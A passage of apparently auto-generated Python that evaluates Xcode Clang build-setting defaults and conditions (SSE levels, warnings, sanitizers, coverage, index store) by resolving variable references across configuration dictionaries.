used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "NO"))
def _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_STRICT_ALIASING__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_INSTRUMENT_PROGRAM_FLOW_ARCS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_TEST_COVERAGE_FILES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ALLOW_INCOMPLETE_PROTOCOL__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) != YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0))
def _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__DefaultValue(xcconfigs, id_configs):
# $(DEBUG_INFORMATION_FORMAT)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEBUG_INFORMATION_FORMAT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0))
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__DefaultValue(xcconfigs, id_configs):
# default
return (False, "default")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE3_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE41_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE42_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_YES__DefaultValue(xcconfigs, id_configs):
# sse3
return (False, "sse3")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_NO__DefaultValue(xcconfigs, id_configs):
# default
return (False, "default")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_YES__DefaultValue(xcconfigs, id_configs):
# ssse3
return (False, "ssse3")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_NO__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_3_$(GCC_ENABLE_SSE3_EXTENSIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SSE3_EXTENSIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_3_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_YES__DefaultValue(xcconfigs, id_configs):
# sse4.1
return (False, "sse4.1")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_NO__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_$(GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_YES__DefaultValue(xcconfigs, id_configs):
# sse4.2
return (False, "sse4.2")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_NO__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_4_1_$(GCC_ENABLE_SSE41_EXTENSIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SSE41_EXTENSIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_4_1_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__CLANG_X86_VECTOR_INSTRUCTIONS__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_4_2_$(GCC_ENABLE_SSE42_EXTENSIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SSE42_EXTENSIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_4_2_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__GCC_SYMBOLS_PRIVATE_EXTERN__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_INLINES_ARE_PRIVATE_EXTERN__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_THREADSAFE_STATICS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_POINTER_SIGNEDNESS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_NEWLINE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_IMPLICIT_SIGN_CONVERSION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_64_TO_32_BIT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INFINITE_RECURSION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_MOVE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_COMMA__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_STRICT_PROTOTYPES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_RANGE_LOOP_ANALYSIS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SEMICOLON_BEFORE_METHOD_BODY__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNGUARDED_AVAILABILITY__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_ABI_VERSION__DefaultValue(xcconfigs, id_configs):
# $(OBJC_ABI_VERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "OBJC_ABI_VERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_LEGACY_DISPATCH__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_OPTIMIZATION_PROFILE_FILE__DefaultValue(xcconfigs, id_configs):
# $(SRCROOT)/OptimizationProfiles/$(PROJECT_NAME).profdata
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SRCROOT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PROJECT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/OptimizationProfiles/{eval_val_1}.profdata".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__Condition(xcconfigs, id_configs):
# ! $(CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING) && ! $(CLANG_COVERAGE_MAPPING)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "CLANG_COVERAGE_MAPPING"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (not eval_val_0 and not eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CODE_COVERAGE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__Condition(xcconfigs, id_configs):
# $(CLANG_ENABLE_CODE_COVERAGE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ENABLE_CODE_COVERAGE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0))
def _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue(xcconfigs, id_configs):
# $(CLANG_COVERAGE_MAPPING)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_COVERAGE_MAPPING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__DefaultValue(xcconfigs, id_configs):
# $(BITCODE_GENERATION_MODE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BITCODE_GENERATION_MODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__Condition(xcconfigs, id_configs):
# $(CLANG_ADDRESS_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__Condition(xcconfigs, id_configs):
# $(CLANG_ADDRESS_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition(xcconfigs, id_configs):
# $(CLANG_ADDRESS_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_UNDEFINED_BEHAVIOR_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_UNDEFINED_BEHAVIOR_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__Condition(xcconfigs, id_configs):
# $(CLANG_UNDEFINED_BEHAVIOR_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_UNDEFINED_BEHAVIOR_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__Condition(xcconfigs, id_configs):
# $(CLANG_UNDEFINED_BEHAVIOR_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_UNDEFINED_BEHAVIOR_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_PATH__DefaultValue(xcconfigs, id_configs):
# $(INDEX_DATA_STORE_DIR)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INDEX_DATA_STORE_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__Condition(xcconfigs, id_configs):
# $(COMPILER_INDEX_STORE_ENABLE) == YES || ( $(COMPILER_INDEX_STORE_ENABLE) == Default && $(GCC_OPTIMIZATION_LEVEL) == 0 )
used_user_content = False
eval_val_0 = ""
eval_key_0 = "COMPILER_INDEX_STORE_ENABLE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "GCC_OPTIMIZATION_LEVEL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" or (eval_val_0 == "Default" and eval_val_1 == "0")))
def _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__DefaultValue(xcconfigs, id_configs):
# $(INDEX_ENABLE_DATA_STORE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INDEX_ENABLE_DATA_STORE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_THREAD_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_THREAD_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_THREAD_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
